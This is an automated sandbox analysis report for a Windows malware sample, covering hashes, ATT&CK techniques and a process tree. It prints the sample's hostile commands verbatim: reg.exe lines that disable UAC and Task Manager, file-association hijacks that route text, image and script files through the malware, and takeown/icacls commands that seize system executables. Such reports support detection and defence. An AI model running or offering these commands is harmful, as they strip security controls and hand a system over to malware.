f2a3a9f378db287bdd6aeb8c68e8e6dbb4c544d01a7e48ce58f4c9f29b5e4b7b

Analysis

max time kernel
122s
max time network
126s
platform
windows7_x64
resource
win7-20231025-en
resource tags

arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system
submitted
01/11/2023, 13:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
Size

458KB
MD5

279fca2fb9903b7be96c3cadc7ef3a50
SHA1

e169f06c121656afcd28fbe0f90cd4565fc31c27
SHA256

f2a3a9f378db287bdd6aeb8c68e8e6dbb4c544d01a7e48ce58f4c9f29b5e4b7b
SHA512

c500b449dee51f63d1fe621987e4bd69e0e6718f07ede27ec13f1d562719819b4f5d58ed6be6c8ee2e2a4e2d0a86b9e0464c9d3c592933d3e83f61eb892654df
SSDEEP

6144:/pW2bgbbV28okoS1oWMkdlZQ5iioct0IwdNOuLcktJFksISWmSILKxrj:/pW2IoioS6jsk

Score

10^/10

discovery evasion exploit persistence trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables Task Manager via registry modification
evasion

Possible privilege escalation attempt 64 IoCs

exploit

pid	Process
3656	takeown.exe
4132	icacls.exe
2096	icacls.exe
2736	icacls.exe
1928	icacls.exe
2416	takeown.exe
3496	icacls.exe
1752	icacls.exe
3192	icacls.exe
3876	takeown.exe
4288	takeown.exe
868	takeown.exe
4272	takeown.exe
2400	takeown.exe
2464	takeown.exe
1532	icacls.exe
2980	icacls.exe
1736	takeown.exe
1628	icacls.exe
1452	icacls.exe
1612	takeown.exe
2540	takeown.exe
4360	takeown.exe
1748	icacls.exe
1996	icacls.exe
3332	icacls.exe
4168	icacls.exe
1268	takeown.exe
2240	takeown.exe
2384	takeown.exe
1988	icacls.exe
3304	icacls.exe
2616	takeown.exe
1980	icacls.exe
4248	takeown.exe
3996	icacls.exe
4048	icacls.exe
2784	takeown.exe
1444	icacls.exe
1960	icacls.exe
3692	takeown.exe
3812	takeown.exe
2772	takeown.exe
2692	icacls.exe
3752	takeown.exe
1512	takeown.exe
2792	icacls.exe
2044	icacls.exe
2576	icacls.exe
2004	takeown.exe
4224	takeown.exe
4388	takeown.exe
4436	takeown.exe
1548	takeown.exe
2476	takeown.exe
548	icacls.exe
2308	takeown.exe
3024	icacls.exe
4032	takeown.exe
4372	icacls.exe
3440	icacls.exe
2492	icacls.exe
2688	takeown.exe
2120	takeown.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2700	icacls.exe
2236	icacls.exe
2672	icacls.exe
2824	icacls.exe
1452	icacls.exe
3664	icacls.exe
4068	icacls.exe
4132	icacls.exe
4332	takeown.exe
1444	icacls.exe
2044	icacls.exe
4308	takeown.exe
4388	takeown.exe
2004	takeown.exe
1104	takeown.exe
1772	icacls.exe
3948	takeown.exe
2664	takeown.exe
3020	takeown.exe
2456	icacls.exe
2868	takeown.exe
548	icacls.exe
3304	icacls.exe
3088	takeown.exe
4444	icacls.exe
2912	icacls.exe
1396	takeown.exe
2164	takeown.exe
3120	icacls.exe
2764	icacls.exe
2308	takeown.exe
3192	icacls.exe
3752	takeown.exe
2416	takeown.exe
2356	icacls.exe
4048	icacls.exe
1044	takeown.exe
3908	takeown.exe
1980	icacls.exe
2096	icacls.exe
2644	icacls.exe
2312	icacls.exe
1180	icacls.exe
3296	takeown.exe
3604	icacls.exe
3996	icacls.exe
4372	icacls.exe
1652	takeown.exe
1736	takeown.exe
872	icacls.exe
308	takeown.exe
2924	takeown.exe
3812	takeown.exe
1512	takeown.exe
2980	icacls.exe
3268	takeown.exe
2376	takeown.exe
2784	takeown.exe
2568	takeown.exe
3536	takeown.exe
3876	takeown.exe
4084	takeown.exe
2588	takeown.exe
840	takeown.exe

Modifies system executable filetype association 2 TTPs 1 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe BATCF %1"	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\WWAHost.exe	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
File opened for modification	C:\Windows\System32\WWAHost.exe	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 13 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe JPGIF %1"	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\giffile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe JPGIF %1"	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe HTMWF %1"	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\rtffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe RTFDF %1"	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe NTPAD %1"	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe NTPAD %1"	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe JPGIF %1"	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe VBSSF %1"	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\icofile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe JPGIF %1"	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe BATCF %1"	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe CMDSF %1"	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe NTPAD %1"	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\inifile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe NTPAD %1"	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
1852	reg.exe
2932	reg.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

description	pid	Process
Token: SeDebugPrivilege	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
Token: SeTakeOwnershipPrivilege	2400	takeown.exe
Token: SeTakeOwnershipPrivilege	2120	takeown.exe
Token: SeTakeOwnershipPrivilege	2784	takeown.exe
Token: SeTakeOwnershipPrivilege	2616	takeown.exe
Token: SeTakeOwnershipPrivilege	2464	takeown.exe
Token: SeTakeOwnershipPrivilege	2868	takeown.exe
Token: SeTakeOwnershipPrivilege	3020	takeown.exe
Token: SeTakeOwnershipPrivilege	2308	takeown.exe
Token: SeTakeOwnershipPrivilege	1512	takeown.exe
Token: SeTakeOwnershipPrivilege	2772	takeown.exe
Token: SeTakeOwnershipPrivilege	2872	takeown.exe
Token: SeTakeOwnershipPrivilege	1396	takeown.exe
Token: SeTakeOwnershipPrivilege	2832	takeown.exe
Token: SeTakeOwnershipPrivilege	2340	takeown.exe
Token: SeTakeOwnershipPrivilege	2804	takeown.exe
Token: SeTakeOwnershipPrivilege	1652	takeown.exe
Token: SeTakeOwnershipPrivilege	2936	takeown.exe
Token: SeTakeOwnershipPrivilege	2848	takeown.exe
Token: SeTakeOwnershipPrivilege	2664	takeown.exe
Token: SeTakeOwnershipPrivilege	1356	takeown.exe
Token: SeTakeOwnershipPrivilege	2112	conhost.exe
Token: SeTakeOwnershipPrivilege	2588	conhost.exe
Token: SeTakeOwnershipPrivilege	2568	conhost.exe
Token: SeTakeOwnershipPrivilege	2688	takeown.exe
Token: SeTakeOwnershipPrivilege	2756	takeown.exe
Token: SeTakeOwnershipPrivilege	1056	takeown.exe
Token: SeTakeOwnershipPrivilege	1104	takeown.exe
Token: SeTakeOwnershipPrivilege	2544	takeown.exe
Token: SeTakeOwnershipPrivilege	1720	takeown.exe
Token: SeTakeOwnershipPrivilege	1360	takeown.exe
Token: SeTakeOwnershipPrivilege	1268	takeown.exe
Token: SeTakeOwnershipPrivilege	1080	takeown.exe
Token: SeTakeOwnershipPrivilege	784	takeown.exe
Token: SeTakeOwnershipPrivilege	1620	takeown.exe
Token: SeTakeOwnershipPrivilege	2240	takeown.exe
Token: SeTakeOwnershipPrivilege	1044	takeown.exe
Token: SeTakeOwnershipPrivilege	2752	takeown.exe
Token: SeTakeOwnershipPrivilege	908	takeown.exe
Token: SeTakeOwnershipPrivilege	1548	takeown.exe
Token: SeTakeOwnershipPrivilege	2476	takeown.exe
Token: SeTakeOwnershipPrivilege	2640	takeown.exe
Token: SeTakeOwnershipPrivilege	1736	takeown.exe
Token: SeTakeOwnershipPrivilege	572	takeown.exe
Token: SeTakeOwnershipPrivilege	2328	takeown.exe
Token: SeTakeOwnershipPrivilege	556	takeown.exe
Token: SeTakeOwnershipPrivilege	1876	takeown.exe
Token: SeTakeOwnershipPrivilege	1568	takeown.exe
Token: SeTakeOwnershipPrivilege	2528	takeown.exe
Token: SeTakeOwnershipPrivilege	2092	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2144 wrote to memory of 1852	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	28
PID 2144 wrote to memory of 1852	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	28
PID 2144 wrote to memory of 1852	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	28
PID 2144 wrote to memory of 2932	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	30
PID 2144 wrote to memory of 2932	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	30
PID 2144 wrote to memory of 2932	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	30
PID 2144 wrote to memory of 2400	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	34
PID 2144 wrote to memory of 2400	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	34
PID 2144 wrote to memory of 2400	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	34
PID 2144 wrote to memory of 1704	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	36
PID 2144 wrote to memory of 1704	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	36
PID 2144 wrote to memory of 1704	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	36
PID 2144 wrote to memory of 2120	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	38
PID 2144 wrote to memory of 2120	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	38
PID 2144 wrote to memory of 2120	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	38
PID 2144 wrote to memory of 2096	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	44
PID 2144 wrote to memory of 2096	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	44
PID 2144 wrote to memory of 2096	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	44
PID 2144 wrote to memory of 2784	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	41
PID 2144 wrote to memory of 2784	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	41
PID 2144 wrote to memory of 2784	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	41
PID 2144 wrote to memory of 1748	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	40
PID 2144 wrote to memory of 1748	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	40
PID 2144 wrote to memory of 1748	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	40
PID 2144 wrote to memory of 2664	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	47
PID 2144 wrote to memory of 2664	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	47
PID 2144 wrote to memory of 2664	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	47
PID 2144 wrote to memory of 2740	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	46
PID 2144 wrote to memory of 2740	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	46
PID 2144 wrote to memory of 2740	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	46
PID 2144 wrote to memory of 2616	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	48
PID 2144 wrote to memory of 2616	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	48
PID 2144 wrote to memory of 2616	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	48
PID 2144 wrote to memory of 2764	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	50
PID 2144 wrote to memory of 2764	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	50
PID 2144 wrote to memory of 2764	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	50
PID 2144 wrote to memory of 2464	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	71
PID 2144 wrote to memory of 2464	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	71
PID 2144 wrote to memory of 2464	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	71
PID 2144 wrote to memory of 2576	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	51
PID 2144 wrote to memory of 2576	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	51
PID 2144 wrote to memory of 2576	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	51
PID 2144 wrote to memory of 2772	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	58
PID 2144 wrote to memory of 2772	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	58
PID 2144 wrote to memory of 2772	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	58
PID 2144 wrote to memory of 2492	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	57
PID 2144 wrote to memory of 2492	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	57
PID 2144 wrote to memory of 2492	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	57
PID 2144 wrote to memory of 2868	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	52
PID 2144 wrote to memory of 2868	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	52
PID 2144 wrote to memory of 2868	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	52
PID 2144 wrote to memory of 2496	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	54
PID 2144 wrote to memory of 2496	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	54
PID 2144 wrote to memory of 2496	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	54
PID 2144 wrote to memory of 2936	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	55
PID 2144 wrote to memory of 2936	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	55
PID 2144 wrote to memory of 2936	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	55
PID 2144 wrote to memory of 2628	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	70
PID 2144 wrote to memory of 2628	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	70
PID 2144 wrote to memory of 2628	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	70
PID 2144 wrote to memory of 2308	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	61
PID 2144 wrote to memory of 2308	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	61
PID 2144 wrote to memory of 2308	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	61
PID 2144 wrote to memory of 1944	2144	NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe	65

C:\Users\Admin\AppData\Local\Temp\NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe
"C:\Users\Admin\AppData\Local\Temp\NEAS.279fca2fb9903b7be96c3cadc7ef3a50.exe"
1⤵
- Modifies system executable filetype association
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2144
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  - UAC bypass
  - Modifies registry key
  PID:1852
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:2932
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\bfsvc.exe"
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:2400
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:1704
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\HelpPane.exe"
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:2120
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:1748
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\hh.exe"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:2784
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2096
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2740
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\splwow64.exe"
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:2664
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\winhlp32.exe"
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:2616
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:2764
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:2576
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\SysWOW64\msra.exe"
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:2868
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2496
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\SysWOW64\quickassist.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2936
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:2492
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\SysWOW64\raserver.exe"
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:2772
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\SysWOW64\sdchange.exe"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:2308
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:1944
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2628
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\write.exe"
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:2464
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2804
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\SysWOW64\logagent.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2848
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:1636
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2840
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:2912
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\SysWOW64\gpscript.exe"
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:3020
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:1628
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2872
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:1512
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:2736
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2832
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:2824
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe"
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:1652
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:1920
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\SysWOW64\runas.exe"
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:1396
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:1332
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\SysWOW64\mstsc.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1356
- C:\Windows\System32\icacls.exe
